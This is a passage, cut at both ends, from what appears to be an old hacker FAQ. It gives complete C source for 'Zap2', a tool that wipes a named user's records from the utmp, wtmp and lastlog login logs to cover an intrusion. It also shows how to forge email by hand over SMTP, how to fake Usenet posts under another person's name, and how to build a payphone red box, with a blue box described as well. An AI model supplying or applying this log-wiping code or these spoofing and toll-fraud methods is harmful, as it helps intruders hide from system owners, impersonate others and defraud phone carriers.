  905. Example:
  906.  
  907. #include <sys/types.h>
  908. #include <stdio.h>
  909. #include <unistd.h>
  910. #include <sys/file.h>
  911. #include <fcntl.h>
  912. #include <utmp.h>
  913. #include <pwd.h>
  914. #include <lastlog.h>
  915. #define WTMP_NAME "/usr/adm/wtmp"
  916. #define UTMP_NAME "/etc/utmp"
  917. #define LASTLOG_NAME "/usr/adm/lastlog"
  918.  
  919. int f;
  920.  
  921. void kill_utmp(who)
  922. char *who;
  923. {
  924.     struct utmp utmp_ent;
  925.  
  926.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  927.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  928.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  929.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  930.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  931.                  write (f, &utmp_ent, sizeof (utmp_ent));
  932.             }
  933.      close(f);
  934.   }
  935. }
  936.  
  937. void kill_wtmp(who)
  938. char *who;
  939. {
  940.     struct utmp utmp_ent;
  941.     long pos;
  942.  
  943.     pos = 1L;
  944.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  945.  
  946.      while(pos != -1L) {
  947.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  948.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  949.           pos = -1L;
  950.         } else {
  951.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  952.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  953.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  954.                write (f, &utmp_ent, sizeof (utmp_ent));
  955.                pos = -1L;
  956.           } else pos += 1L;
  957.         }
  958.      }
  959.      close(f);
  960.   }
  961. }
  962.  
  963. void kill_lastlog(who)
  964. char *who;
  965. {
  966.     struct passwd *pwd;
  967.     struct lastlog newll;
  968.  
  969.      if ((pwd=getpwnam(who))!=NULL) {
  970.  
  971.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  972.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  973.             bzero((char *)&newll,sizeof( newll ));
  974.             write(f, (char *)&newll, sizeof( newll ));
  975.             close(f);
  976.         }
  977.  
  978.     } else printf("%s: ?\n",who);
  979. }
  980.  
  981. main(argc,argv)
  982. int argc;
  983. char *argv[];
  984. {
  985.     if (argc==2) {
  986.         kill_lastlog(argv[1]);
  987.         kill_wtmp(argv[1]);
  988.         kill_utmp(argv[1]);
  989.         printf("Zap2!\n");
  990.     } else
  991.     printf("Error.\n");
  992. }
  993.  
  994.  
  995. 10. How do I send fakemail?
  996.  
  997. Telnet to port 25 of the machine you want the mail to appear to
  998. originate from.  Enter your message as in this example:
  999.  
  1000.  HELO bellcore.com
  1001.  MAIL FROM:Voyagor@bellcore.com
  1002.  RCPT TO:clinton@whitehouse.gov
  1003.  DATA
  1004.  
  1005.         Please discontinue your silly Clipper initiative.
  1006. .
  1007. QUIT
  1008.  
  1009. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  1010. line will not work.  Test by sending yourself fakemail first.
  1011.  
  1012.  
  1013. 11. How do I fake posts to UseNet?
  1014.  
  1015. Use inews to post.  Give inews the following lines:
  1016.  
  1017. From:
  1018. Newsgroups:
  1019. Subject:
  1020. Message-ID:
  1021. Date:
  1022. Organization:
  1023.  
  1024. For a moderated newsgroup, inews will also require this line:
  1025.  
  1026. Approved:
  1027.  
  1028. Then add your post and terminate with <Control-D>.
  1029.  
  1030. Example:
  1031.  
  1032. From: Dale Drew
  1033. Newsgroups: alt.2600
  1034. Subject: Please forgive me
  1035. Message-ID: <d_drew.123@tymnet.com>
  1036. Date: Fri, 13 Jun 1994 12:15:03
  1037. Organization: Tymnet Insecurity
  1038.  
  1039. Please forgive me for being such a worthless puke all of these years.
  1040.  
  1041.                                                 Sincerely,
  1042.  
  1043.                                                         Bartman
  1044. ^D
  1045.  
  1046.  
  1047. 12. What is a Red Box?
  1048.  
  1049. When a coin is inserted into a payphone, the phone emits a set of
  1050. tones.  A red box is a device that simulates those tones, with the
  1051. purpose of fooling the payphone into believing you have inserted an
  1052. actual coin.
  1053.  
  1054.  
  1055. 13. How do I build a Red Box?
  1056.  
  1057. Red boxes are commonly manufactured from modified Radio Shack tone
  1058. dialers, Hallmark greeting cards, or made from scratch from readily
  1059. available electronic components.
  1060.  
  1061. To make a Red Box from a radio shack tone dialer, open the dialer and
  1062. replace the crystal (the largest shiny metal component) with a crystal
  1063. close to 6.5Mhz.  The most popular choice is the 6.5536Mhz crystal.
  1064. When you are finished, program the P1 button with five *'s.  That will
  1065. simulate a quarter tone.  Note that the tone dialer you start with
  1066. must have programmable buttons.
  1067.  
  1068.  
  1069. 14. Which payphones will a Red Box work on?
  1070.  
  1071. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  1072. (Customer Owned Coin Operated Telephones).
  1073.  
  1074.  
  1075. 15. What is a Blue Box?
  1076.  
  1077. Blue boxes use a 2600hz tone to convince telephone switches that use
  1078. in-band signalling that the caller is actually a telephone operator.
  1079. The caller may then access special switch functions, with the usual
  1080. purpose of making free long distance phone calls, using the
  1081. Multi-Frequency tones provided by the Blue Box.
  1082.  
  1083.  
  1084. 16. Do Blue Boxes still work?
  1085.  
  1086. Blue Boxes still work in areas using in-band signalling.  Modern phone
  1087.  
  1088.  
  1089.  
  1090.  
  1091.